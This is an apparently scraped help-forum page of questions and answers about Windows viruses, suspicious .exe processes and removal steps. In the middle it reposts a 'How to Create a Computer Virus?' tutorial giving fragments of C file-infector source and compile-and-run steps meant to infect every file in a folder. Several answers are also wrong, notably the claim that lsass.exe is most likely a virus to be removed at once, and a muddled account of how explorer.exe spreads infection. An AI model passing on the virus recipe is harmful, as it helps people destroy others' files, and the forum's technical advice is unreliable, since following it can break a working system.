How can i know a virus file like .exe

Your anti virus software should detect the virus once downloading, if not, then scan the file once downloaded. Make sure you have a powerful antivirus, otherwise you can get a free one like AVG 8, from

Posted on Jun 27, 2008

Posted on Jan 02, 2017

Please Help!! my pc is not getting any anti virus installed(i tried kaspersky,eset,avira,bit defender etc),some virus(i don't know the name) is infecting my pc.. it slowed down speed of my...

Yes, this sounds like a serious virus infection.
Try this:
1. Download a free Antivirus program like Avast:
2. Your downloaded file will be "setup_av_free.exe".
3. Instead of opening the exe file as is, rename the file first. You can rename a file by selecting it then right click then choose "rename". For example, you can rename the file to "paris.exe" or whatever you want.
4. After renaming the file, you can now run and install it.
Note: Some viruses recognize antivirus programs because they know the installer file names. By renaming the installer file, you are tricking the virus into allowing you to install the antivirus application.

How to Reduce Spreading of Virus on the Hard Drive

<b><u>An insight in VIRUS INFECTION and VIRUS SPREADING</u></b><br /> <br /> In today's computing spreading of virus is fast and very common.<br /> Even with an up to dated antivirus software the spreading of the virus infection is fast.<br /> This is because, we are not aware of how the virus spreads in our system.<br /> Once we know how the virus infects and spreads in our system then we will definitely reduce the risk, time and money spent.<br /> <br /> <b><u>Here is a short insight about viruses:</u></b><br /> <br /> 1) Virus is a small program code enabling it to to mingle or merge with other program codes.<br /> <br /> 2) The Virus Program Code is written such that it deletes data, corrupts data, steals data send it to the maker of the code, etc.<br /> <br /> 3) The virus cannot run on its own. It has to be executed just like other exe program files. That is why the autorun.inf file is required.<br /> <br /> <b><u>Now for an insight how we get infected:</u></b><br /> <br /> 1) Thorugh the internet: Usually when we browse any web site files are downloaded from the web server to our temporary internet folder(in windows) Then our Browser software reads the files and executes them in the browser window for us to view the web site.( If you are a website Designer you would understand this for others get an insight how internet browsers work), So when we are in the internet Virus files attach themself to the downloading files and enter our system in the temporary folder, From here they are executed by our browser software or when any program accesses the temporary folder.<br /> <br /> 2) Another one is we download a lot of data from the internet, we should be careful on what we are downloading because if the data downloaded is infected with virus then we are downloading the virus to our system along with the data, Don't download the data unless you are sure you could trust the maker of the data, program,etc.<br /> <br /> 3) From other medias like Flash Drive, CD's, DVD,s,etc.:<br /> We copy a lot of data to our computer from our friends and relatives, so if the data is already infected with virus we copy the virus to our system also, when we run os use the data the virus is executed along with it.<br /> <br /> <b><u>Now for an insight how Virus Spreads:</u></b><br /> <b></b> <br /> Just like any other program code the virus code has to be executed.<br /> That is why the virus merges with other exe's which are executable and not with the data file.<br /> <br /> For eg: a file with .avi, .dat, .3gp, etc. all these files are data files they dont execute, but they are used by exe files like wmplayer.exe, winamp.exe, vlplayer.exe, etc. The .avi .dat .3gp files are data files, the wmplayer.exe, winamp.exe vlplayer.exe are program files. Thus mostly exe program file get infected with virus.<br /> <br /> Usually when our system gets infected and any antivirus program cleans our system you can notice that the windows media player or winamp player or vlc media player does'nt work because it is removed or deleted by the antivirus for virus infection but the songs or video you saved is unharmed in the harddisk.<br /> <br /> That is why the virus code hangs or merges or infects mostly exe program files, So that it is executed along with the program file.<br /> <br /> So when you run an infected windows media player to play a song the virus code is also run along with the windows media player. Thus the virus is run again and again.<br /> <br /> There are hundreds of program files in the os for doing various tasks.<br /> we are going to look into just one program which the virus uses to spread itself in our system.<br /> <br /> The Program is non other than explorer.exe in windows. This program is needed to view or browse the data files stored in the hard disk.<br /> When we double click the My Computer Icon on the desktop the explorer.exe is executed which show you a window on your screen with the hard disk drives and cd dvd drives in the windows Now you can imagine how frequently you use the explorer.exe. You use it to view any data on the computer, even our desktop uses explorer.exe. This program is executed right when windows logs us on.<br /> <br /> When this program file is infected, it keeps on executing the virus each time we use the program. by this method the virus spreads fast to every parts of the hard disk.<br /> <br /> Likely there is a method to avoid executing the virus along with the explorer.exe each time we use it.<br /> <br /> When we double click any icon or object on our windows screen we execute the default command in the right click menu. Usually it is the Run Command. for eg: when you double click word the word.exe runs, similarly when we double click the my computer icon the default right menu option is <b>Open</b> which run the explorer.exe program.<br /> <br /> Instead of using this method to view files and data in our system we could use an alternate method which is using the explorer menu option when we right click my computer or right click the windows start button or in fact the explorer option is there whenever you right click any object on the screen.<br /> <br /> By using this explorer option in the right click you get a window with two panes one to the left and one to the right. In the left pane you have the directory structure showing all the directories and folders in our hard disk and in the right pane the content of the directory or folder selected in the left pane.<br /> <br /> Thus in this process we dont execute any code or program command when viewing the data in our hard disk. because we do not execute the explorer.exe more than once.<br /> <br /> So, Imagine how we reduce the spreading of virus by using this method.<br /> <br /> Say you have a file saved in your hard disk in this location<br /> <br /> <b>C:\data\monday\20-11-2010\office\media\todaysjob.doc</b><br /> <br /> If you want to open the file with word we will double click my computer, then double click C Drive, then Double Click data folder,then double click monday folder, then double click 20-11-2010 folder, then double click till you come to the media folder then you double click the todaysjob.doc which will execute the word.exe program which reads the data in the todaysjob.doc file and displays the content as required. In this process see how many time you will execute the virus, You will run the virus Seven Times.<br /> <br /> In our Alternate method You will run the Explorer.exe only once, Then on you just navigate to the media folder then double click the todaysjob.doc file in the right panel. So you execute the virus only once. <br /> <br /> Hence you reduce the spreading of VIRUS to a great extend.<br /> <br /> Good Luck, If there are any mistake please bare with me, I am not a good writer. If you have any Question Keep Me Posted.

How to Create a Computer Virus?
Submitted by Srikanth on Friday, 7 December 200781 Comments This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
if(host==NULL) goto next;
printf(“Infecting %s\n”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,

BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

1. Open new empty folder

3. Run the virus EXE file there you will see all the files in the current directory get infected.
4.All the infected files will be ready to reinfect
That’s it

Pls advise if the following processes running in my Task Manager are viruses or genuine system processes - ccSvcHst.exe; lsass.exe; explorer.exe, winlogon.exe; svchost.exe; wuauclt.exe; jqs.exe;...

ccSvcHst.exe - works to display the GUI (Graphical User Interface) of Norton products, which usually include the Norton Security Suites.
lsass.exe - Disable and remove lsass.exe Immediately. This process is most likely a virus or trojan.

Other processes are required for essential applications to work properly.

You can visit this and search for the process your not familiar with.

Please rate this if you find this helpful.


My program file regsvr.exe delete.How restore this

Dear Amartya,

Here is a solution for your problem.

What the regsvr.exe virus does?
• This worm creates folders and a registry entry to enable its automatic execution at every system startup.
• This worm also creates a scheduled task to enable its automatic execution at a specified date and/or time.
• It also creates Autorun.inf file for its auto execution.
Solution to fix the problem:
1. If the task manager and registry editor is disabled then we need to enable them first. Read this post.
2. Delete the Autorun.inf file created by the virus. Read this post to know how to do that.
3. Now type msconfig in the Run dialog and click on startup tab.
4. Look for regsvr and uncheck any options, click OK.
5. Now traverse to control panel -> scheduled tasks, and delete the At1 task that might be listed there.
6. Type regedit in the Run dialog to open the registry editor.
7. Click on Edit -> Find and search for regsvr.exe
8. Just delete all the occurrences of regsvr.exe virus (do not confuse it with regsvr32.exe which is not a virus).
9. Navigate to entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and modify the entry Shell = "Explorer.exe regsvr.exe" to delete the regsvr.exe from it.

I think it helps.Let me know

Best regards
Chandrashekahr Bhat

Cant get automatic updates from mirosoft.cant down load .cant find rundill 32 exe.cant find help suport .

What is rundll32.exe? Is rundll32.exe spyware or a virus?
This program is part of Windows, and is used to run program code in DLL files as if they were within the actual program. However, many viruses also use this name or similar ones. This file is also commonly used by spyware to launch its own malicious code.
Note: The rundll32.exe file is located in the folder C:\Windows\System32. In other cases, rundll32.exe is a virus, spyware, trojan or worm!

If you don't have this file in System32 then you have other problems. Possibly a virus is onboard.

Window can not find gphone.exe

gphone.exe is nowadays one of the most dangerous virus spreading very fastly.Its a trojan and changes your IE homepage and sends tries to open gtalk and yahoo messenger.It even sends messages to gtalk contacts.Its icon is just like that of folder icon and people thinking of folder click on it get infected by the virus.
Gphone virus basically is a 260 kb .exe file which looks like a folder and it can take any name of any other folder if you have clicked on the virus folder which looks like a folder but it isnt.If you have a folder name “comptalks” in your D drive it will make a exe file in the folder named comptalks.exe and if you click on that exe file it too work as a virus.It makes .exe files in all the folders you have with the name of the folder.
To remove the gphone.exe virus you just need to follow simple steps:
Go to Task Manager ->Processes and then click on gphone.exe and click on end process.
After that manually go to folder where gphone.exe is present and simply delete it.
Or simply search for the exe file clicking which started sending messages through gtalk. If you clicked on 1.exe search for that file on task manager and then delete it.

Good luck.

To get rid csrcs.exe. file

Find and Detect csrcs.exe on your PC. to find the file click search and put the file name and thn find its location from there and delete it. Remove, Uninstall and Get Rid of csrcs.exe

NEw Folder Virus

u know it correctly that it is a virus u have to instal another antivirus.
u can search all the files *.exe and sees that who shows as in folder icon delets them from the system and in future not to double click on this new folder.exe file
best of luck

Funny UST scandal virus

Funny UST scandal virus Disinfection.. Virus Disinfection Using McAfee Antivirus

1. To disinfect the virus please download the latest sdat????.exe from this site and save it C:\TEMP

2. Now restart the System and press F8 key
3. Select Safe mode with Command Prompt
4. Then change directory to C:\TEMP
5. There type the filename and give the parameters as follows:

C:\TEMP>sdat5185.exe /e

After few seconds in that directory you will find some files that extracted from the dat file.

6. Give commands as follows:

C:\Temp>SCAN /all /adl /clean /report Report.log

This will clean all the virus in the system.

Hope this will helps you..

If this works please comment me.....

Nandu :)

